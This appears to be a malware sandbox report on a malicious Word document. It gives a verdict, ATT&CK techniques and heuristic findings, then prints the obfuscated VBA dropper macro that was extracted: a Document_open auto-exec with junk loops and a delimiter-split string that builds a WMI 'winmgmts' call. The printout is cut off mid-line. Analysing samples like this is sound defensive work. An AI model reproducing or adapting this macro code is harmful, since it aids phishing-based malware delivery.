Verdict: MALICIOUS (risk score 142)
Malware Insights

MITRE ATT&CK techniques:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1047 WMI (Windows Management Instrumentation)
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is present and configured to execute automatically, indicating an attempt to run malicious code upon opening the document. The GetObject call further suggests the execution of external code. While the VBA code is heavily obfuscated and truncated, its presence and auto-execution trigger are strong indicators of a downloader or dropper.
Heuristics (5)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body) |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7499 bytes | eae12ec0adca4893d56cd720a52715dc074a24e946bcb5d4d9a1f20894a9ea29 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Jepjwaaqaamz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Xmyaygmvtv, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Ryohzngv = 234 + 423
Do While Xhxckjxv = 1
Hhdroptyujsb = 3 * Ivumncdtw
Xhjrzfpq = ("Iste magni distinctio numquam illum quisquam quam minima.")
For Kvwtjuibkjvf = Ppkhoqnlbrqi To Udclomxzx
Hvslrfsr = ("Vero et aut unde.")
Kvhcwhzt = 223
Next
Bkbghhkq = Qrqehuvzklyqv
Loop
Kvbfglrzr
Jmgfwvnge = 234 + 423
Do While Cmkdeuqcxtl = 1
Yxoerrunufh = 3 * Jibgxlvoqsr
Hogfnxdqhzhj = ("Qui et eveniet.")
For Eahhciplhar = Nbhewxvjfgorj To Biuwixrniloxg
Goryqoavk = ("Repellat nihil rerum ab.")
Eyusptrpjygu = 223
Next
Vnysizpn = Azlblbnk
Loop
End Sub
Attribute VB_Name = "Gsoknbun"
Attribute VB_Base = "0{5FD7884A-141B-468D-BABB-0639DF734BE8}{B290731F-00E1-4FA7-85CC-84F998A45FA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Etceolpj"
Function Vlptvrwkyy()
Tfpksmuriti = 234 + 423
Do While Jmekulsyblx = 1
Upcpehgsggohg = 3 * Witvxpbtih
Mqrtrrvre = ("Ab error.")
For Pbtvdgqcnahc = Bvitwthtztco To Plsggpeudtxmr
Gfoybqvnyhvlv = ("In ut omnis error.")
Tpuuncibvcogs = 223
Next
Jbdvsoopkfuxu = Eiteaisxru
Loop
Bgvsklceikepw = Jepjwaaqaamz.Xmyaygmvtv
Uudhvnkk = 234 + 423
Do While Wrxapcubzix = 1
Eyowknzpti = 3 * Plztjpdrwiuwb
Hrdqeajzjgqa = ("Ipsa.")
For Xciafzqviq = Bnvervttsyqr To Gmqmsohizflw
Emjnxlzveepv = ("Dolorem excepturi.")
Qzmrikse = 223
Next
Xeltoptvzcof = Tgvkilxw
Loop
Twuajgnimx = Bgvsklceikepw + Gsoknbun.Tpctrwvl + Gsoknbun.Lewhkjaenyppe + Gsoknbun.Wadciacihu
Ecusarquyncxp = 234 + 423
Do While Kkxcplkcnt = 1
Rvhlzqym = 3 * Xohbktekmtoo
Zufmuahyinzyr = ("Nisi eum tempora.")
For Hrairmiv = Qychxpcu To Fllrbmzftb
Chfbngjk = ("Deleniti doloribus dicta vel nesciunt voluptas.")
Qldcerlxweiqx = 223
Next
Igencbmpp = Bvcwkyufuaoz
Loop
Rwhsvasqayjvl = Twuajgnimx + Gsoknbun.Tfvsiusnj + Gsoknbun.Ffftzxhkpw.Tag
Enipklatnxpcd = 234 + 423
Do While Nttkimexlzou = 1
Xbsqezaaah = 3 * Rekaeprtecd
Kaqxpwqjk = ("Meredith")
For Wlzeumtmosvzn = Ycyduxfjtzkc To Fghnodsqny
Rzopacmuxn = ("Gina")
Vyrcffkjh = 223
Next
Molygchpz = Gfueyhqqmr
Loop
Vlptvrwkyy = Hhjaocxappmpa + Rwhsvasqayjvl + Hhjaocxappmpa
Zbxoxwajrrwj = 234 + 423
Do While Kuemgzoapn = 1
Pgxvddgnhwc = 3 * Flesidafhl
Gjcdzlkgigtlw = ("Natus iusto eum.")
For Dufoskabnjhg = Jivgvwudk To Rnezsswukw
Wzoghptr = ("Rerum.")
Yyxxfary = 223
Next
Weaxvcuqlm = Ygzggpnnqq
Loop
End Function
Function Kvbfglrzr()
Xdqrrexdtgv = 234 + 423
Do While Ikqcpoklgoao = 1
Jdynuecdb = 3 * Wwcypbefz
Nsjbxcrpqc = ("Voluptatem blanditiis a totam enim voluptatem placeat impedit eveniet.")
For Ozusbioejxwts = Qmwirizpge To Amlcduzoy
Dxkubqvpjp = ("Quod consequatur.")
Ctukooko = 223
Next
Bosxutztto = Tkgoyzko
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Ibaqraws = 234 + 423
Do While Huaioubecliwm = 1
Lfatsftsxj = 3 * Psidnzluiv
Wskhesmocefvv = ("Provident repudiandae libero ut.")
For Rncdzumlmtiu = Ddqtcwau To Fwfgkmmhogu
Smdkgxovx = ("Recusandae.")
Yapcsdtwboy = 223
Next
Fbahbgpgwxx = Ltxxshgrhkxkp
Loop
Rnyaxlwhc = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&8
... (truncated)